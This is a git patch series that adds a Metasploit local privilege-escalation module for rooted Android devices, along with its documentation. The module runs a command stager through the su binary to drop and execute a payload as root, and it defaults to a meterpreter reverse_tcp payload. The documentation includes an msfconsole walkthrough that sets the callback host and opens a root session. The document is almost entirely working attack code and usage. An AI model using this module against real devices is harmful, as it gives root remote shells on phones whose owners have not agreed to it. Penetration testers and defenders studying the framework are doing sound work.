From 37530f037ed0c25bf719807c59e6e3427410f1b7 Mon Sep 17 00:00:00 2001 From: Tim Date: Fri, 1 Sep 2017 10:57:48 +0800 Subject: [PATCH 1/5] su -> meterpreter as root --- modules/exploits/android/local/su_exec.rb | 60 +++++++++++++++++++++++ 1 file changed, 60 insertions(+) create mode 100644 modules/exploits/android/local/su_exec.rb diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb new file mode 100644 index 0000000000..db5dc6d6e7 --- /dev/null +++ b/modules/exploits/android/local/su_exec.rb @@ -0,0 +1,60 @@ +## +# This module requires Metasploit: https://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Exploit::Local + Rank = ExcellentRanking + + include Msf::Exploit::CmdStager + + def initialize(info={}) + super( update_info( info, { + 'Name' => "Android 'su' Privilege Escalation", + 'Description' => %q{ + This module uses the su binary present on rooted devices to run + a payload as root. + }, + 'License' => MSF_LICENSE, + 'DisclosureDate' => 'Aug 31 2017', + 'SessionTypes' => [ 'meterpreter' ], + 'Platform' => [ 'android', 'linux' ], + 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64, ARCH_MIPSLE], + 'Targets' => [ + ['armle', {'Arch' => ARCH_ARMLE}], + ['aarch64',{'Arch' => ARCH_AARCH64}], + ['x86', {'Arch' => ARCH_X86}], + ['x64', {'Arch' => ARCH_X64}], + ['mipsle', {'Arch' => ARCH_MIPSLE}] + ], + 'DefaultTarget' => 0, + } + )) + register_options([ + OptString.new('SU_BINARY', [true, 'The su binary to execute to obtain root', 'su']), + OptString.new('WritableDir', [true, 'Writable directory', '/data/local/tmp/']), + ]) + end + + def exploit + arch = cmd_exec("getprop ro.product.cpu.abi") + print_status("Arch: #{arch}") + + linemax = 4088 - datastore['SU_BINARY'].size + execute_cmdstager({ + flavor: :echo, + enc_format: :octal, + prefix: '\\\\0', + temp: datastore['WritableDir'], + linemax: linemax, + background: true, + }) + end + + def execute_command(cmd, opts) + su_cmd = "#{datastore['SU_BINARY']} -c #{cmd}" + cmd_exec(su_cmd) + end + +end + From 19eb86790dca8551257c6e45960538b5162646de Mon Sep 17 00:00:00 2001 From: Tim W Date: Sun, 6 May 2018 14:28:34 +0800 Subject: [PATCH 2/5] add android module to run payloads with su --- modules/exploits/android/local/su_exec.rb | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb index db5dc6d6e7..e6128b5b97 100644 --- a/modules/exploits/android/local/su_exec.rb +++ b/modules/exploits/android/local/su_exec.rb @@ -17,12 +17,12 @@ class MetasploitModule < Msf::Exploit::Local }, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Aug 31 2017', - 'SessionTypes' => [ 'meterpreter' ], + 'SessionTypes' => [ 'meterpreter', 'shell' ], 'Platform' => [ 'android', 'linux' ], - 'Arch' => [ARCH_ARMLE, ARCH_AARCH64, ARCH_X86, ARCH_X64, ARCH_MIPSLE], + 'Arch' => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE], 'Targets' => [ - ['armle', {'Arch' => ARCH_ARMLE}], ['aarch64',{'Arch' => ARCH_AARCH64}], + ['armle', {'Arch' => ARCH_ARMLE}], ['x86', {'Arch' => ARCH_X86}], ['x64', {'Arch' => ARCH_X64}], ['mipsle', {'Arch' => ARCH_MIPSLE}] @@ -37,9 +37,6 @@ class MetasploitModule < Msf::Exploit::Local end def exploit - arch = cmd_exec("getprop ro.product.cpu.abi") - print_status("Arch: #{arch}") - linemax = 4088 - datastore['SU_BINARY'].size execute_cmdstager({ flavor: :echo, @@ -52,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Local end def execute_command(cmd, opts) - su_cmd = "#{datastore['SU_BINARY']} -c #{cmd}" + su_cmd = "#{datastore['SU_BINARY']} -c '#{cmd}'" cmd_exec(su_cmd) end From 67fc37c36976606e8f6aaf20776f256555a9c856 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 7 May 2018 18:29:54 +0800 Subject: [PATCH 3/5] improve description --- modules/exploits/android/local/su_exec.rb | 12 +++++++++++- 1 file changed, 11 insertions(+), 1 deletion(-) diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb index e6128b5b97..836ff37ebf 100644 --- a/modules/exploits/android/local/su_exec.rb +++ b/modules/exploits/android/local/su_exec.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Local - Rank = ExcellentRanking + Rank = ManualRanking include Msf::Exploit::CmdStager @@ -14,6 +14,16 @@ class MetasploitModule < Msf::Exploit::Local 'Description' => %q{ This module uses the su binary present on rooted devices to run a payload as root. + + A root Android device will contain a su binary (often linked with + an application) that allows the user to run commands as root. + This module will use the su binary to execute a command stager + as root. The command stager will write a payload binary to a + temporary directory, make it executable, execute it in the background, + and finally delete the executable. + + On most devices the su binary will pop-up a prompt on the device + asking the user for permission. }, 'License' => MSF_LICENSE, 'DisclosureDate' => 'Aug 31 2017', From 629c5a82f19570d2bd97f9e8c7ac0c3c1ed3e34e Mon Sep 17 00:00:00 2001 From: Tim W Date: Thu, 17 May 2018 20:48:25 +0800 Subject: [PATCH 4/5] default to aarch64 --- modules/exploits/android/local/su_exec.rb | 25 ++++++++++++++++++----- 1 file changed, 20 insertions(+), 5 deletions(-) diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb index 836ff37ebf..34a4c1f38f 100644 --- a/modules/exploits/android/local/su_exec.rb +++ b/modules/exploits/android/local/su_exec.rb @@ -7,6 +7,8 @@ class MetasploitModule < Msf::Exploit::Local Rank = ManualRanking include Msf::Exploit::CmdStager + include Msf::Post::File + include Msf::Post::Android::Priv def initialize(info={}) super( update_info( info, { @@ -15,7 +17,7 @@ class MetasploitModule < Msf::Exploit::Local This module uses the su binary present on rooted devices to run a payload as root. - A root Android device will contain a su binary (often linked with + A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a @@ -29,7 +31,7 @@ class MetasploitModule < Msf::Exploit::Local 'DisclosureDate' => 'Aug 31 2017', 'SessionTypes' => [ 'meterpreter', 'shell' ], 'Platform' => [ 'android', 'linux' ], - 'Arch' => [ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE], + 'Arch' => [ ARCH_AARCH64, ARCH_ARMLE, ARCH_X86, ARCH_X64, ARCH_MIPSLE ], 'Targets' => [ ['aarch64',{'Arch' => ARCH_AARCH64}], ['armle', {'Arch' => ARCH_ARMLE}], @@ -37,6 +39,7 @@ class MetasploitModule < Msf::Exploit::Local ['x64', {'Arch' => ARCH_X64}], ['mipsle', {'Arch' => ARCH_MIPSLE}] ], + 'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }, 'DefaultTarget' => 0, } )) @@ -46,20 +49,32 @@ class MetasploitModule < Msf::Exploit::Local ]) end + def base_dir + datastore['WritableDir'].to_s + end + + def su_bin + datastore['SU_BINARY'].to_s + end + def exploit - linemax = 4088 - datastore['SU_BINARY'].size + if is_root? + fail_with Failure::BadConfig, 'Session already has root privileges' + end + + linemax = 4088 - su_bin.size execute_cmdstager({ flavor: :echo, enc_format: :octal, prefix: '\\\\0', - temp: datastore['WritableDir'], + temp: base_dir, linemax: linemax, background: true, }) end def execute_command(cmd, opts) - su_cmd = "#{datastore['SU_BINARY']} -c '#{cmd}'" + su_cmd = "#{su_bin} -c '#{cmd}'" cmd_exec(su_cmd) end From dea3f90e0b64d8246583306234c492664836c3d2 Mon Sep 17 00:00:00 2001 From: Tim W Date: Mon, 1 Oct 2018 17:50:33 +0800 Subject: [PATCH 5/5] add documentation with the current status --- .../modules/exploit/android/local/su_exec.md | 57 +++++++++++++++++++ modules/exploits/android/local/su_exec.rb | 5 +- 2 files changed, 61 insertions(+), 1 deletion(-) create mode 100644 documentation/modules/exploit/android/local/su_exec.md diff --git a/documentation/modules/exploit/android/local/su_exec.md b/documentation/modules/exploit/android/local/su_exec.md new file mode 100644 index 0000000000..5ebba74610 --- /dev/null +++ b/documentation/modules/exploit/android/local/su_exec.md @@ -0,0 +1,57 @@ +## Description + +This module uses the su binary present on rooted devices to run a payload as root. + +A rooted Android device will contain a su binary (often linked with an application) that allows the user to run commands as root. +This module will use the su binary to execute a command stager as root. The command stager will write a payload binary to a +temporary directory, make it executable, execute it in the background, and finally delete the executable. + +On most devices the su binary will pop-up a prompt on the device asking the user for permission. + +## Vulnerable Application + +This module will only work on *rooted* devices. An off the shelf Android device is unlikely to be rooted, however it's possible to root a device without losing the data. +Many devices can be rooted by flashing new firmware, however the existing data will be lost. + +## Verfication steps + +You'll first need to obtain a session on the target device. To do this follow the instructions [here](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/payload/android/meterpreter/reverse_tcp.md) + +Once the module is loaded, one simply needs to set the `SESSION` option and configure the handler. +An example session follows: + +``` +msf5 exploit(multi/handler) > sessions + +Active sessions +=============== + + Id Name Type Information Connection + -- ---- ---- ----------- ---------- + 1 meterpreter dalvik/android u0_a80 @ localhost 192.168.0.176:4444 -> 192.168.0.107:46059 (192.168.0.107) + +msf5 exploit(multi/handler) > use exploit/android/local/su_exec +msf5 exploit(android/local/su_exec) > set SESSION 1 +SESSION => 1 +msf5 exploit(android/local/su_exec) > set payload linux/aarch64/meterpreter/reverse_tcp +payload => linux/aarch64/meterpreter/reverse_tcp +msf5 exploit(android/local/su_exec) > set LHOST 192.168.0.176 +LHOST => 192.168.0.176 +msf5 exploit(android/local/su_exec) > set LPORT 4445 +LPORT => 4445 +msf5 exploit(android/local/su_exec) > run + +[!] SESSION may not be compatible with this module. +[*] Started reverse TCP handler on 192.168.0.176:4445 +[*] Transmitting intermediate midstager...(256 bytes) +[*] Sending stage (818780 bytes) to 192.168.0.107 +[*] Meterpreter session 2 opened (192.168.0.176:4445 -> 192.168.0.107:49710) at 2018-10-01 17:44:50 +0800 +[-] Exploit failed: Rex::TimeoutError Operation timed out. +[*] Exploit completed, but no session was created. + +``` + +Please not that in most cases you will have to manually confirm the Superuser prompt +on the device itself before the module completes. You can do `set WfsDelay 10` to +give yourself more time. + diff --git a/modules/exploits/android/local/su_exec.rb b/modules/exploits/android/local/su_exec.rb index 34a4c1f38f..a69c3a3503 100644 --- a/modules/exploits/android/local/su_exec.rb +++ b/modules/exploits/android/local/su_exec.rb @@ -39,7 +39,10 @@ class MetasploitModule < Msf::Exploit::Local ['x64', {'Arch' => ARCH_X64}], ['mipsle', {'Arch' => ARCH_MIPSLE}] ], - 'DefaultOptions' => { 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp' }, + 'DefaultOptions' => { + 'PAYLOAD' => 'linux/aarch64/meterpreter/reverse_tcp', + 'WfsDelay' => 5, + }, 'DefaultTarget' => 0, } ))